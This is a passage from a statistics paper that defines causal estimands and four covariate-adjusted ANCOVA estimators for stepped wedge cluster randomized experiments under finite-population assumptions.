Sun and Abraham (2021). However, these efforts were primarily focused on unit-level treatment assignment without the multilevel data structure, whereas we specifically focused on cluster-level randomization and individual-level data analysis. We also focused on establishing the finite population Central Limit Theorem under the Stable Unit Treatment Value Assumption (SUTVA) where there is a single version of intervention agnostic to the treatment duration (i.e. no learning effect or weakening effect over time if applied to the same unit). This is an assumption commonly invoked to analyze stepped wedge cluster randomized experiments in the literature and under this assumption, we seek to clarify appropriate causal estimands and survey a class of model-assisted analytical strategies. The rest of this article is structured as follows. Section 2 introduces the finite population causal inference framework and discusses causal estimands for stepped wedge cluster randomized experiments. Section 3 introduces four ANCOVA estimators and establishes their theoretical properties under finite population asymptotic regimes. Section 4 and 5 present results from our simulation study and the illustrative analysis of the Washington State Expedited Partner Therapy study. Section 6 concludes with a discussion and outlines directions for future research. ## 2 Notation and Estimands ### Assumptions for stepped wedge designs We consider the cross-sectional stepped wedge design (Copas et al., 2015), where different individuals are included in each cluster at the beginning of each distinct period. In a typical stepped wedge design, there are three experimental phases, the pre-rollout, where no clusters receive treatment (i.e. all clusters are placed under the control condition), the rollout, where clusters are randomized to different treatment schedules in a staggered fashion, and the post-rollout, where all clusters have received the treatment (Thompson et al., 2017). To formalize a standard stepped wedge design (standard in a sense that there is a single pre-rollout period and a single post-rollout period), we assume a study with \(I\) clusters (indexed by \(i\)) and \(J+2\) periods (indexed by \(j\)), where period \(0\) is the pre-rollout and period \(J+1\) is the post-rollout. We use \(Z_{ij}\in\{0,1\}\) to denote the treatment status indicator for cluster \(i\in\{1,\ldots,I\}\) in rollout period \(j\in\{0,1,\ldots,J+1\}\), and the number of treated clusters in each rollout period \(j\), \(I_{j}\), is known and fixed for all \(j\). The rollout starts with \(I_{1}\) clusters randomized to treatment in period \(1\), and in period \(2\), the previously selected \(I_{1}\) clusters remain treated, while \(I_{2}-I_{1}\) out of the \(I-I_{1}\) untreated clusters are randomized to treatment, and so forth. This process ends with all clusters being eventually treated in period \(J+1\). It is immediate that \(Z_{i0}=0\) and \(Z_{i,J+1}=1\) due to definition of the pre-rollout and post-rollout period, and that \(0=I_{0}<I_{1}\leq I_{2}\leq\cdots\leq I_{J}<I_{J+1}=I\). This specific randomization design implies that elements of \(\mathbf{Z}_{i}=(Z_{i0},Z_{i1},\ldots,Z_{ij},Z_{i,J+1})^{\prime}\) are correlated, with \(Z_{i0}=0\), \(Z_{i,J+1}=1\), and \(Z_{ij^{\prime}}=1\) if \(Z_{ij}=1\) for all \(j^{\prime}>j\). Additionally, it can be shown that the marginal distribution of the treatment variable across clusters in each period \(j\), \((Z_{1j},\ldots,Z_{Ij})\), follows a hyper-geometric distribution with parameters \((I,I_{j})\). For individuals \(k=1,\ldots,N_{ij}\) in cluster-period \((i,j)\), we proceed to define the potential outcome. We let \(A_{i}=a\in\mathcal{A}=\{1,\ldots,J,J+1\}\), denote the period index such that cluster \(i\) first receives treatment (the so-called _treatment adoption time_), and therefore \(Z_{ij}=\mathbb{I}\{A_{i}\leq j\}\). Without any further assumptions, each individual has potential outcome \(Y_{ijk}^{A_{i},\mathbf{A}_{-i}}\) that depends not only the adoption time for cluster \(i\) but also those for other clusters (\(\mathbf{A}_{-i}\) is the vector of adoption time for all other clusters). We first impose a cluster-level SUTVA, formalized in Assumption 1. **Assumption 1** (Cluster-level SUTVA).: _Let \(Y_{ijk}^{A_{i},\mathbf{A}_{-i}}\) denote the potential outcome for an individual given the adoption time of all clusters, then \(Y_{ijk}^{A_{i},\mathbf{A}_{-i}}=Y_{ijk}^{A_{i},\mathbf{A}_{-i}^{*}}\), \(\forall\ \mathbf{A}_{-i}\neq\mathbf{A}_{-i}^{*}\)._ Assumption 1 implies that individual-level potential outcomes from cluster \(i\) in period \(j\) only depend on the specific treatment assignment of cluster \(i\) but not on assignments for other clusters. This is a conventional assumption made for cluster randomized experiments and is likely plausible if the clusters are not in close geographical proximity. It rules out interference between clusters and allows us to define potential outcome \(Y_{ijk}^{A_{i}}\) without ambiguity. However, the notation \(Y_{ijk}^{A_{i}}\) implicitly assumes that the potential outcome can depend on the treatment adoption time and therefore duration of the treatment. While this form is plausible in some settings where there is a learning effect due to delayed treatment implementation (Hughes et al., 2015; Kenny et al., 2022; Maleyeff et al., 2022), in this article, we consider the following assumption to further reduce the number of potential outcomes based on a dichotomy of treatment receipt. **Assumption 2** (Treatment duration irrelevance).: _There is only a single version of treatment across different periods such that variations in treatment duration is irrelevant to the potential outcomes. That is, for each \(k\in\{1,\ldots,N_{ij}\}\), (i) \(Y_{ijk}^{a}=Y_{ijk}^{a^{\prime}}=Y_{ijk}(1)\), if \(\max\{a,a^{\prime}\}\leq j\); (ii) \(Y_{ijk}^{a}=Y_{ijk}^{a^{\prime}}=Y_{ijk}(0)\), if \(\min\{a,a^{\prime}\}>j\); (iii) \(Y_{ijk}^{a}=Y_{ijk}(1)\), \(Y_{ijk}^{a^{\prime}}=Y_{ijk}(0)\), if \(a\leq j<a^{\prime}\), for \(a\), \(a^{\prime}\in\mathcal{A}\) and \(j\in\{0,1,\ldots,J,J+1\}\)._ Assumption 2 implies that individual-level potential outcomes from cluster \(i\) in period \(j\) only depend on the treatment received at that period, \(Z_{ij}\), such that we can write \(Y_{ijk}(Z_{ij})\) without ambiguity. Furthermore, Assumption 2 can be considered as a version of the _treatment-variation irrelaxance_ assumption (VanderWeele, 2009) to rule out multiple versions of a treatment. To this extent, Assumptions 1 and 2 can be jointly considered as a generalized SUTVA applied to stepped wedge cluster randomized experiments. Indeed, the treatment duration irrevalance has been conventionally assumed in the literature for stepped wedge designs (Li et al., 2021), even though rarely stated formally. It can also be considered as a multilevel extension of the _no anticipation_ and _invariance to history_ assumptions in the difference-in-differences literature (Athey and Imbens, 2022). Under Assumption 2, we can write the observed individual-level outcomes as \(Y_{ijk}=Z_{ij}Y_{ijk}(1)+(1-Z_{ij})Y_{ijk}(0)\) for each rollout period \(j\). However, the observed outcome \(Y_{i0k}=Y_{i0k}(0)\) and \(Y_{i,J+1,k}=Y_{i,J+1,k}(1)\) for all \(k\) by definition of the pre-rollout and post-rollout periods. To complete the data specification, we assume the cluster-period size \(N_{ij}\) to be unaffected by treatment assignment; thus ruling out post-randomization selection bias (Li et al., 2022). We write the number of individuals in cluster \(i\) as \(N_{i}=\sum_{j=1}^{J}N_{ij}\), the number of individuals in period \(j\) as \(N_{j}=\sum_{i=1}^{I}N_{ij}\), and the total number of individuals across clusters and periods as \(N=\sum_{i=1}^{I}\sum_{j=1}^{J}N_{ij}\). We further denote \(\mathbf{Q}_{ijk}\) as the vector of individual-level baseline covariates recorded during recruitment (assumed exogenous and not affected by assignment), \(\mathbf{C}_{ij}\) the vector of cluster-level characteristics (can depend on period), possibly including components of cluster-level summaries, \(\overline{\mathbf{Q}}_{ij}=N_{ij}^{-1}\sum_{k=1}^{N_{ij}}\mathbf{Q}_{ijk}\), summary of the pre-rollout outcomes, \(\overline{Y}_{i0}=N_{i0}^{-1}\sum_{k=1}^{N_{i0}}Y_{i0k}\) and cluster-period size \(N_{ij}\). The collection of covariates not affected by treatment assignment for each individual can then be defined as \(\mathbf{X}_{ijk}=\mathbf{Q}_{ijk}\cup\mathbf{C}_{ij}\). The observed data for each cluster-period, therefore, is \(\{(Y_{ijk},Z_{ij},\mathbf{X}_{ijk}),k=1,\ldots,N_{ij}\}\). Finally, we assume the following. **Assumption 3** (Stepped wedge randomization).: _Write \(\mathcal{Y}\) and \(\mathcal{X}\) as the collection of all potential outcomes and covariates across individuals and cluster-periods, then_ \[P(\mathbf{Z}_{i}=\mathbf{z}|\mathcal{Y},\mathcal{X})=\binom{I}{I_{1},I_{2}-I_{1}, \ldots,I_{J+1}-I_{J}}^{-1},\] _where \(Z_{i0}=0\) and \(Z_{i1}=1\) almost surely._ Assumption 3 defines the rollout schedule and states the source of randomness in the observed outcome. Importantly, we write \(e_{j}=I_{j}/I\) as the cluster-level propensity score fixed by design, and naturally have \(0=e_{0}<e_{1}\leq e_{2}\leq\cdots\leq e_{J}<e_{J+1}=1\). The cluster-level propensity score \(e_{0}=0\) and \(e_{J+1}=1\), thus violating the _positivity_ assumption (Imbens and Rubin, 2015); this is a consequence of the particular study design, and because there is no possibility for individuals during these two periods (the pre-rollout and post-rollout periods) to receive the unobserved counterfactual treatment assignment, we set \(Y_{i0k}(1)=\star\) and \(Y_{i,J+1,k}(0)=\star\), and only formulate estimands based on the rollout periods. The idea of considering the potential outcomes with no possibility to be observed as undefined values is reminiscent of the _truncation-by-death_ problem (Zhang et al., 2009), and one can consider that \(\{Y_{i0k}(1),Y_{i,J+1,k}(0)\}\) are truncated by the study design. We do acknowledge, however, that it might be possible to leverage additional assumptions to extrapolate \(\{Y_{i0k}(1),Y_{i,J+1,k}(0)\}\) from the observed data; we do not pursue this idea here but provide a discussion on this point in Section 6. ### Causal estimands We consider a finite population framework where all potential outcomes are fixed, and variability is solely driven by randomization distribution. Under Assumptions 1 and 2, we are interested in the following class of weighted average treatment effect (WATE) estimands during the rollout periods, defined as \[\tau^{w}=\sum_{j=1}^{J}\frac{w_{j}}{\sum_{j=1}^{J}w_{j}}\left[\frac{\sum_{i=1 }^{I}w_{ij}\left\{\overline{Y}_{ij}(1)-\overline{Y}_{ij}(0)\right\}}{\sum_{i=1 }^{I}w_{ij}}\right]=\overline{Y}(1)-\overline{Y}(0), \tag{1}\] where the weighted cluster-period mean potential outcome is \[\overline{Y}_{ij}(z)=\frac{\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}(z)}{\sum_{k=1}^{N _{ij}}w_{ijk}},\text{for }z\in\{0,1\},\] with individual-specific weight \(\omega_{ijk}\geq 0\), cluster-period total weight, \(w_{ij}=\sum_{k=1}^{N_{ij}}w_{ijk}\), and period total weight, \(w_{j}=\sum_{i=1}^{I}w_{ij}\). This estimand has also been considered by Schochet et al. (2021) in blocked cluster randomized controlled experiments, and a subtle conceptual difference is that we have excluded the pre-rollout and post-rollout periods due to lack of positivity. Furthermore, observe that the weighted average treatment effect of period \(j\) as \[\tau_{j}^{w}=\frac{\sum_{i=1}^{I}w_{ij}\left\{\overline{Y}_{ij}(1)-\overline{Y }_{ij}(0)\right\}}{\sum_{i=1}^{I}w_{ij}}=\overline{Y}_{j}(1)-\overline{Y}_{j}( 0).\] This quantity is a building block of (1), and is essentially a weighted average treatment effect in the spirit of Su and Ding (2021) for a parallel-arm cluster randomized experiment with a single period. Despite the generality of (1), we focus on three specific members under different choices of the weights corresponding to interpretable estimands for stepped wedge cluster randomized experiments. Firstly, the uniform weight is given by \(w_{ijk}=1\) that weighs each individually equally. For this specification, the cluster-period total weight \(w_{ij}=\sum_{k=1}^{N_{ij}}w_{ijk}=N_{ij}\), the period total weight \(w_{j}=\sum_{i=1}^{I}w_{ij}=N_{j}\), \(\overline{Y}_{ij}(z)=\sum_{k=1}^{N_{ij}}Y_{ijk}(z)/N_{ij}\) and \(\overline{Y}_{ij}=\sum_{k=1}^{N_{ij}}Y_{ijk}/N_{ij}\) become the simple average of the potential and observed outcomes in each cluster-period. The estimand in period \(j\) is \[\tau_{j}^{w}=\frac{\sum_{i=1}^{I}\left\{N_{ij}\overline{Y}_{ij}(1)-N_{ij} \overline{Y}_{ij}(0)\right\}}{N_{j}}=\frac{\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}} \left\{Y_{ijk}(1)-Y_{ijk}(0)\right\}}{N_{j}}, \tag{2}\] which represents the individual-average treatment effect as defined in parallel-arm cluster randomized experiment (Kahan et al., 2022) as it is the average of individual-level counterfactual contrasts, across all patients from all clusters in period \(j\). The final estimand over the rollout population under the uniform weight is \[\tau^{ind}=\frac{\sum_{j=1}^{J}\sum_{i=1}^{I}\sum_{k=1}^{N_{ij}} \left\{Y_{ijk}(1)-Y_{ijk}(0)\right\}}{\sum_{j=1}^{J}N_{j}}=\overline{Y}^{ind} (1)-\overline{Y}^{ind}(0),\] which is the average of all individual-level counterfactual contrasts, across all patients in clusters and all rollout periods. Secondly, we consider the inverse period size weight, where \(w_{ijk}=N_{j}^{-1}\). This specification is akin to the scaled cluster total representation in Su and Ding (2021) when analyzing parallel-arm cluster randomized experiments. In this case, \(w_{ij}=\sum_{k=1}^{N_{ij}}w_{ijk}=N_{j}^{-1}N_{ij}\) and \(w_{j}=\sum_{i=1}^{I}w_{ij}=1\). The estimand in period \(j\) is therefore equal to (2). Since the period-specific total weight is 1, the final estimand over the rollout population is given as \[\tau^{period}=\frac{\sum_{j=1}^{J}\left\{N_{j}^{-1}\sum_{i=1}^{I} \sum_{k=1}^{N_{ij}}\left\{Y_{ijk}(1)-Y_{ijk}(0)\right\}\right\}}{J}=\overline{ Y}^{period}(1)-\overline{Y}^{period}(0),\] which is interpreted as the simple average of period-specific mean counterfactual contrasts over all rollout periods, and referred to as the period-average treatment effect. Finally, we consider the inverse cluster-period size weight, where \(w_{ijk}=N_{ij}^{-1}\). For this specification, we have \(w_{ij}=\sum_{k=1}^{N_{ij}}w_{ijk}=1\), \(w_{j}=\sum_{i=1}^{I}w_{ij}=I\), \(\overline{Y}_{ij}(z)=\sum_{k=1}^{N_{ij}}Y_{ijk}(z)/N_{ij}\) as the simple average of the potential outcomes in each cluster-period, leading to a period-specific estimand defined as \(\tau_{j}^{w}=I^{-1}\sum_{i=1}^{I}\left\{\overline{Y}_{ij}(1)-\overline{Y}_{ ij}(0)\right\}\), which can be considered as the cluster-average treatment effect, or unit-average treatment effect defined for parallel-arm cluster randomized experiments (Su and Ding, 2021; Wang et al., 2022). The final causal estimand average across all rollout periods is therefore given by \[\tau^{cell}=\frac{\sum_{j=1}^{J}\sum_{i=1}^{I}\left\{\overline{Y}_{ij}(1)- \overline{Y}_{ij}(0)\right\}}{IJ}=\overline{Y}^{cell}(1)-\overline{Y}^{cell} (0),\] which is the average of all cluster-period-specific or cell-specific mean counterfactual contrasts. We refer to this estimand as the cell-average treatment effect, where each cell represents a unique cluster-period during the rollout. Table 1 provides a quick summary of the weight specifications and interpretations of these three estimands, which explicate whether the treatment effect estimates target the expected value of outcomes when applied to the population of all individuals, population of cluster-period cells, or populations of individuals in an average period. In general settings where the cluster sizes are variable, these three estimands are not necessarily equal, especially when there is an association between the cluster-period size \(N_{ij}\) and the within-cluster counterfactual contrasts; this has been referred to as the informative cluster size (Kahan et al., 2022). However, when the cluster-period sizes \(N_{ij}\)'s are homogeneous or the treatment effect is constant across cluster-period cells, the three estimands will coincide. In the more general settings where the three estimands can take different values, they may be interpreted differently and the choice of estimands will depend on the study context, the nature of the intervention and the study objectives. In general, the individual-average treatment effect answers the question "_how effective is the intervention for an average individual during the entire rollout?_", the period-average treatment effect answers the question "_how effective is the intervention for an average individual during an average period?_", whereas the cell-average treatment effect answers the question "_how effective is the intervention for an average cluster-period cell?_" Answers to these three questions pertain to different aspects of the intervention effect and may lead to different policy implications. The differentiation of estimands in stepped wedge cluster randomized experiments in this work can be seen as the counterparts of those developed for parallel-arm cluster randomized experiments; see, for example, Kahan et al. (2022). ## 3 Analysis of covariance point and variance estimators ### ANCOVA Model Formulation To estimate the class of estimands (1) and specific members in Table 1, we first consider the following working ANCOVA model that allows for baseline covariate adjustment: \[Y_{ijk}=\beta_{j}+\tau_{j}Z_{ij}+\widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}+e_{ijk}, \tag{3}\] where \(\beta_{j}\) is the period fixed effect or referred to as the secular trend parameter in the stepped wedge design literature, \(\tau_{j}\) is the period-specific average treatment effect parameter, \(\widetilde{\mathbf{X}}_{ijk}=\mathbf{X}_{ijk}-\overline{\mathbf{X}}_{j}\) is the \(p\)-dimensional period-mean centered baseline covariate row vector with \(\overline{\mathbf{X}}_{ij}=\sum_{k=1}^{N_{ij}}w_{ijk}\mathbf{X}_{ijk}/\sum_{k=1}^{N_{ ij}}w_{ijk}\) and \(\overline{\mathbf{X}}_{j}=\sum_{i=1}^{I}w_{ij}\overline{\mathbf{X}}_{ij}/\sum_{i=1}^{I }w_{ij}\), \(\mathbf{\gamma}\) is the associated parameter vector, and \(e_{ijk}\) is the individual-level random noise. Model (3) has been used in Schochet et al. (2021) to analyze blocked cluster randomized experiments, and shares some connections with the ANCOVA I estimator discussed in Lin (2013) and Tsiatis et al. (2008) applied to individually randomized experiments. Therefore, we call model (3) the ANCOVA I model. Importantly, ANCOVA I is a working model in a sense that we can interpret \(\tau_{j}\) as a causal effect parameter regardless of whether the linear index, \(\widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}\), is compatible with the unknown true data generating process (DGP); for this reason, the resulting estimator for \(\tau_{j}\) is model-assisted rather than model-based. The working ANCOVA I model also covers the unadjusted estimator where no covariate adjustments are included or by setting the parameter vector \(\mathbf{\gamma}=\mathbf{0}\). Besides ANCOVA I, we also consider three possibile variations of model formulation, depending on whether treatment-by-covariate or treatment-by-covariate-by-period interactions are considered in the working model. Specifically, the ANCOVA II model includes period-specific main effects of the covariates, and is written as \[Y_{ijk}=\beta_{j}+\tau_{j}Z_{ij}+\widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}_{j}+e_{ ijk}. \tag{4}\] \begin{table} \begin{tabular}{c l l} \hline \hline **Estimand** & **Choice of weight** & **Interpretation** \\ \hline \(\tau^{ind}=\overline{\mathbf{Y}}^{ind}(1)-\overline{\mathbf{Y}}^{ind}(0)\) & \(w_{ijk}=1\) & The average of individual-level counterfactual contrasts, \\ & \(w_{ij}=N_{ij}\) & across all individuals during the rollout. This estimand gives \\ & \(w_{j}=N_{j}\) & equal weight to each individual. \\ \hline \(\tau^{period}=\overline{\mathbf{Y}}^{period}(1)-\overline{\mathbf{Y}}^{period}(0)\) & \(w_{ijk}=N_{ij}^{-1}\) & The average of individual-level counterfactual contrasts per \\ & \(w_{ij}=N_{ij}/N_{j}\) & period, which is further averaged across all rollout period. \\ & \(w_{j}=1\) & This estimand gives equal weight to each rollout periods. \\ \hline \(\tau^{cell}=\overline{\mathbf{Y}}^{cell}(1)-\overline{\mathbf{Y}}^{cell}(0)\) & \(w_{ijk}=N_{ij}^{-1}\) & The average of cluster-period cell-level mean counterfactual \\ & \(w_{ij}=1\) & contrasts, across all cluster-period cells during roll-out. This \\ & \(w_{j}=I\) & estimand gives equal weight to each cluster-period cell. \\ \hline \hline \end{tabular} \end{table} Table 1: A summary of definitions for three interpretable causal estimands in the general family of estimands (1) In the special case where \(\mathbf{\gamma}_{j}=\mathbf{\gamma}\) for all \(j\), ANCOVA II model reduces to the ANCOVA I model. In the analyses of individually randomized experiments and parallel-arm cluster randomized experiments, effects of the interactions between the treatment status and the covariate vector are often considered as a strategy to further improve precision under unbalanced randomization (Lin, 2013; Su and Ding, 2021). We thus further include the following ANCOVA III model with treatment-by-covariate interactions: \[Y_{ijk}=\beta_{j}+\tau_{j}Z_{ij}+\widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}+Z_{ij} \widetilde{\mathbf{X}}_{ijk}\mathbf{\eta}+e_{ijk}, \tag{5}\] and the ANCOVA IV model with period-specific treatment-by-covariate interactions: \[Y_{ijk}=\beta_{j}+\tau_{j}Z_{ij}+\widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}_{j}+Z_{ij} \widetilde{\mathbf{X}}_{ijk}\mathbf{\eta}_{j}+e_{ijk}. \tag{6}\] Setting \(\mathbf{\eta}=\mathbf{0}\) and \(\mathbf{\eta}_{j}=\mathbf{0}\) respectively in the ANCOVA III and ANCOVA IV models, we obtain the ANCOVA I and ANCOVA II models as two special cases. For ANCOVA III and IV models, a reparameterization can be useful in facilitating the derivations of analytical results. Specifically, we separate the model components by treatment conditions and obtain: \[Y_{ijk}=(1-Z_{ij})\beta_{j}+(1-Z_{ij})\widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}+Z_{ ij}\tau_{j}^{*}+Z_{ij}\widetilde{\mathbf{X}}_{ijk}\mathbf{\eta}^{*}+e_{ijk},\] and \[Y_{ijk}=(1-Z_{ij})\beta_{j}+(1-Z_{ij})\widetilde{\mathbf{X}}_{ijk}\mathbf{\gamma}_{j}+ Z_{ij}\tau_{j}^{*}+Z_{ij}\widetilde{\mathbf{X}}_{ijk}\mathbf{\eta}_{j}^{*}+e_{ijk},\] where \(\tau_{j}^{*}=\beta_{j}+\tau_{j}\), \(\mathbf{\eta}^{*}=\mathbf{\gamma}+\mathbf{\eta}\), and \(\mathbf{\eta}_{j}^{*}=\mathbf{\gamma}_{j}+\mathbf{\eta}_{j}\). Our proposed ANCOVA estimators for \(\tau_{j}^{w}\) are obtained via fitting either one of the above four working ANCOVA models using weighted least squares (WLS) with weights \(w_{ijk}\) that is specified according to the estimand of interest. Table 2 provides a succinct summary of the different model formulations. Before we proceed, we first establish the following Lemma which indicates that the four ANCOVA estimators can be written in similar forms and therefore can be considered as members of a family of estimators. **Lemma 1**.: _Defining \(w_{j}^{1}=\sum_{i=1}^{I}Z_{ij}w_{ij}\) and \(w_{j}^{0}=\sum_{i=1}^{I}(1-Z_{ij})w_{ij}\) as the treatment-specific total weight per period, the WLS estimators for \(\tau_{j}^{w}\), obtained from fitting ANCOVA I-IV, have the following closed-form expression:_ \[\widehat{\tau}_{j}^{w}=\frac{1}{w_{j}^{1}}\sum_{i:Z_{ij}=1}w_{ij}\overline{U} _{ij}(1)-\frac{1}{w_{j}^{0}}\sum_{i:Z_{ij}=0}w_{ij}\overline{U}_{ij}(0)= \overline{u}_{j}(1)-\overline{u}_{j}(0). \tag{7}\] _In particular, if we further define \(\overline{y}_{j}(z)=\sum_{i:Z_{ij}=z}w_{ij}\overline{Y}_{ij}(z)/w_{j}^{z}\) and \(\widetilde{\mathbf{X}}_{j}^{z}=\sum_{i:Z_{ij}=z}w_{ij}\widetilde{\mathbf{X}}_{ij}/w_{j} ^{z}=\sum_{i:Z_{ij}=z}\sum_{k=1}^{N_{ij}}w_{ijk}\widetilde{\mathbf{X}}_{ijk}/w_{j} ^{z}\) for \(z\in\{0,1\}\). Then,_ 1. _for ANCOVA I,_ \(\widehat{\tau}_{j}^{w}=\widehat{\tau}_{j}\)_,_ \(\overline{U}_{ij}(z)=\overline{Y}_{ij}(z)-\widetilde{\mathbf{X}}_{ij}\widehat{\bm {\gamma}}\)_, and_ \(\overline{u}_{j}(z)=\overline{y}_{j}(z)-\widetilde{\mathbf{X}}_{j}^{z}\widehat{\bm {\gamma}}\)_;_ 2. _for ANCOVA II,_ \(\widehat{\tau}_{j}^{w}=\widehat{\tau}_{j}\)_,_ \(\overline{U}_{ij}(z)=\overline{Y}_{ij}(z)-\widetilde{\mathbf{X}}_{ij}\widehat{ \mathbf{\gamma}}_{j}\)_, and_ \(\overline{u}_{j}(z)=\overline{y}_{j}(z)-\widetilde{\mathbf{X}}_{j}^{z}\widehat{ \mathbf{\gamma}}_{j}\)_;_ 3. _for ANCOVA III,_ \(\widehat{\tau}_{j}^{w}=\widehat{\tau}_{j}^{*}-\widehat{\beta}_{j}\)_,_ \(\overline{U}_{ij}(1)=\overline{Y}_{ij}(1)-\widetilde{\mathbf{X}}_{ij}\widehat{ \mathbf{\eta}}^{*}\)_,_ \(\overline{U}_{ij}(0)=\overline{Y}_{ij}(0)-\widetilde{\mathbf{X}}_{ij}\widehat{\bm {\gamma}}\)_,_ \(\overline{u}_{j}(1)=\overline{y}_{j}(1)-\widetilde{\mathbf{X}}_{j}^{j}\widehat{ \mathbf{\eta}}^{*}\)_, and_ \(\overline{u}_{j}(0)=\overline{y}_{j}(0)-\widetilde{\mathbf{X}}_{j}^{0}\widehat{ \mathbf{\gamma}}\)_;_ 4. _for ANCOVA IV,_ \(\widehat{\tau}_{j}^{w}=\widehat{\tau}_{j}^{*}-\widehat{\beta}_{j}\)_,_ \(\overline{U}_{ij}(1)=\overline{Y}_{ij}(1)-\widetilde{\mathbf{X}}_{ij}\widehat{ \mathbf{\eta}}_{j}^{*}\)_,_ \(\overline{U}_{ij}(0)=\overline{Y}_{ij}(0)-\widetilde{\mathbf{X}}_{ij}\widehat{ \mathbf{\gamma}}_{j}\)_,_ \(\overline{u}_{j}(1)=\overline{y}_{j}(1)-\widetilde{\mathbf{X}}_{j}^{j}\widehat{ \mathbf{\eta}}_{j}^{*}\)_, and_ \(\overline{u}_{j}(0)=\overline{y}_{j}(0)-\widetilde{\mathbf{X}}_{j}^{0}\widehat{ \mathbf{\gamma}}_{j}\)_,_ \begin{table} \begin{tabular}{l c c c} \hline \hline **Estimator** & **Mean model** & \begin{tabular}{c} **Period-specific** \\ **covariate effects** \\ \end{tabular} & \begin{tabular}{c} **Treatment-by-** \\ **covariate interactions** \\ \end{tabular} \\ \hline ANCOVA I & \(\beta_{j}+\tau_{j}Z_{ij}+(\mathbf{X}_{ijk}-\mathbf{X}_{j})\mathbf{\gamma}\) & \(\times\) & \(\times\) \\ \hline ANCOVA II & \(\beta_{j}+\tau_{j}Z_{ij}+(\mathbf{X}_{ijk}-\mathbf{X}_{j})\mathbf{\gamma}_{j}\) & \(\checkmark\) & \(\times\) \\ \hline ANCOVA III & \(\beta_{j}+\tau_{j}Z_{ij}+(\mathbf{X}_{ijk}-\mathbf{X}_{j})\mathbf{\gamma}+Z_{ij}(\mathbf{X}_{ ijk}-\mathbf{X}_{j})\mathbf{\eta}\) & \(\times\) & \(\checkmark\) \\ \hline ANCOVA IV & \(\beta_{j}+\tau_{j}Z_{ij}+(\mathbf{X}_{ijk}-\mathbf{X}_{j})\mathbf{\gamma}_{j}+Z_{ij}(\mathbf{X}_{ ijk}-\mathbf{X}_{j})\mathbf{\eta}_{j}\) & \(\checkmark\) & \(\checkmark\) \\ \hline \hline \end{tabular} \end{table} Table 2: Four model-assisted analysis of covariance estimators adjusting for baseline covariates in stepped wedge cluster randomized experiments. _where \(\widehat{\tau}_{j}\), \(\widehat{\tau}_{j}^{*}\), \(\widehat{\beta}_{j}\), \(\widehat{\tau}\), \(\widehat{\mathbf{\gamma}}_{j}\), \(\widehat{\mathbf{\eta}}^{*}\), and \(\widehat{\mathbf{\eta}}_{j}^{*}\) are the estimated regression coefficients from fitting the respective working models._ Lemma 1 suggests that all four ANCOVA estimators can be written in a similar form, which is the difference between weighted averages of cluster-period residualized potential outcomes. The nonparametric estimator, where no covariate adjustments are considered, is also a special member of (7) with \(\overline{U}_{ij}(z)=\overline{Y}_{ij}(z)\) and \(\overline{u}_{j}(z)=\overline{y}_{j}(z)\). The proof of Lemma 1 is given in Web Appendix A. With Lemma 1, we can show that, under Assumptions 1-3, each ANCOVA estimator of \(\tau^{w}\), defined as a weighted average of \(\widehat{\tau}_{j}^{w}\), \(j=1,\ldots,J\), i.e., \[\widehat{\tau}^{w}=\frac{\sum_{j=1}^{J}w_{j}\widehat{\tau}_{j}^{w}}{\sum_{j=1 }^{J}w_{j}}. \tag{8}\] is consistent to the target estimand \(\tau^{w}\) even if the working ANCOVA models are incorrectly specified. ### Theoretical Properties Under the staggered rollout randomization scheme, we formalize the theoretical properties of \(\widehat{\tau}^{w}\) under the asymptotic regime similar to that in Middleton and Aronow (2015), Li and Ding (2017) and Schochet et al. (2021), where an increasing sequence of finite populations are considered with the number of clusters, \(I\to\infty\). In our case, the number of rollout periods, \(J\), will be assumed as fixed. Furthermore, we assume that the number clusters randomized to the treatment condition in period \(j\) increases proportionally, that is, \(I_{j}/I=e_{j}\) as \(I\to\infty\). Finally, we assume that the number of individuals in each cluster and the corresponding weight remain relatively balanced for each period (no clusters with a dominating number of individuals or weights in any rollout period), and neither varies as a function of \(I\). The last assumption is to prevent ill-mannered behaviors of the ANCOVA estimators. For stepped wedge designs, an important consideration is that treatment assignments for a cluster, and between any pairs of clusters, across rollout periods are correlated, which is different from a parallel-arm or blocked cluster randomization scheme (where randomization is conducted independently within each block; see, for example, Schochet et al. (2021)). Therefore, to present a finite population Central Limit Theorem (CLT) for \(\widehat{\tau}^{w}\), these aforementioned correlations must be addressed. Similar to Athey and Imbens (2022) and Roth and Sant'Anna (2021), we introduce an alternative perspective of viewing different treatment adoption times as different treatment arms and potential outcomes for a cluster across \(J\) rollout periods as a \(J\)-dimensional potential outcome vector, which leverages the random assignment to multiple arms, each of which is uniquely determined by the treatment adoption time. Specifically, we let \(A_{i}=a\), \(a\in\mathcal{A}=\{1,\ldots,J,J+1\}\), denote the adoption date of the treatment for cluster \(i\), and we have \(G_{ia}=\mathbb{I}\{A_{i}=a\}\), which is equal to one if cluster \(i\) adopts the treatment at period \(a\). Note that cluster \(i\) does not receive treatment throughout the rollout phase if \(A_{i}=J+1\). Under this perspective, the \(J\)-dimensional potential outcome vector of individual \(k\) in cluster \(i\) with adoption date \(a\) is \(\mathbf{Y}_{ik}^{a}=(Y_{i1k}^{a},\ldots,Y_{iJk}^{a})^{\prime}\) and the corresponding weighted average for cluster \(i\) is \(\overline{\mathbf{Y}}_{i}^{a}=(\overline{Y}_{i1}^{a},\ldots,\overline{Y}_{iJ}^{a} )^{\prime}\), where \(\overline{Y}_{ij}^{a}=\sum_{k=1}^{N_{ij}}w_{ijk}Y_{ijk}^{a}/\sum_{k=1}^{N_{ ij}}w_{ijk}\). We can then write the observed potential outcome vector of individual \(k\) in cluster \(i\) as \(\mathbf{Y}_{ik}=\sum_{a\in\mathcal{A}}G_{ia}\mathbf{Y}_{ik}^{a}\), where \(\mathbf{Y}_{ik}=(Y_{i1k},\ldots,Y_{iJk})^{\prime}\) with \(Y_{ijk}=\sum_{a\in\mathcal{A}}G_{ia}Y_{ijk}^{a}\). We further define \(\overline{\mathbf{Y}}^{a}=\left(\overline{Y}_{1}^{a},\ldots,\overline{Y}_{J}^{a} \right)^{\prime}\), where \(\overline{Y}_{j}^{a}=\sum_{i=1}^{I}w_{ij}\overline{Y}_{ij}^{a}/\sum_{i=1}^{I} w_{ij}\). Then Assumption 2 allows us to re-express components of the weighted average treatment effect of period \(j\) 